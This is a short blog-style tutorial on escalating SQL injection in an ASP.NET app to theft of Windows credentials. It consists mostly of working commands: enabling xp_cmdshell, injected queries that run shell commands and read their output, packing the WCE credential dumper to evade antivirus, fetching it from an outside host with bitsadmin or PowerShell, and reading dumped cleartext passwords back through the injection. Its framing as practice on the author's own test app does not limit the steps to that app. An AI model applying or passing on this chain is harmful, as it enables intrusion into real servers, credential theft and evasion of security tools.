Get credentials of system through Sql Injection

I was wondering how to get the credentials and rdp into the system through a Sql Injection. To practice the sql injection I have created a test voting application (Asp.net 4.5). It can be downloaded at: https://github.com/ka3hk/web_attacks

Here are the steps to get the credentials through sqlI:

1. Enable xp_cmdshell 
2. Download wce on to the machine 
3. Get the IP address
4. Run wce as the administrator & output to a text file
5. Read the data from the ouput file

1. Enable xp_cmdshell

xp_cmdshell allows command execution on windows based systems. It is usually not enabled by default & it has to be enabled. It can be enabled with this command:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Now we should be able to run commands through sql. The format is below:

execute xp_cmdshell 'command'

Reading the output from xp_cmdshell is slightly tricky. This can be done in three steps:

• Create a new table (say IIP) with 1 column and insert the output of xp_cmdshell into a table
• Read the data from the table IIP using union
• Delete the table IIP

Here is an example on using xp_cmdshell to get the IP using ipconfig

• create table iip(line varchar(2000));insert into iip  execute xp_cmdshell 'ipconfig'
• union select 2,line,'a',2 from iip
• drop table iip

2. Download wce on the machine

WCE (windows credential extractor) is an awesome tool which can be used to dump credentials in clear text. You will need to run as administrator to run this tool. Most AVs have blacklisted the tool. 

I used a packer mpress (UPX packer should work as well) to pack this executable to avoid detection. 

Check this executable for AV. 

Host this exe on an internet site or some place the sql server can reach. Use the command line below to download files or powershell can be used as well. 

bitsadmin /transfer mydownloadjob  /download /priority normal http://yoursite destination

$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile("source","dest")

3. Get the IP

Use xp_cmdshell to get the IP

execute xp_cmdshell 'ipconfig'

4. Run WCE as admin and output data to a file

Wce should be run as an admin & it was hard to read the output directly from wce through sql. So I sent the output to a file. Later read the values from the output file into a table in the database. 

WCE command

C:\temp\wce_mp.exe -w > C:\temp\output.txt

SQL command

k3';create table iip(line varchar(2000));insert into iip  execute xp_cmdshell 'C:\temp\wce_mp.exe -w > C:\temp\output.txt';--

5. Read data from the file

The data can be read using the windows command type

type file.txt

SQL Command to read output

k3';insert into iip  execute xp_cmdshell 'type C:\temp\output.txt';--

I have created a video for the exploit.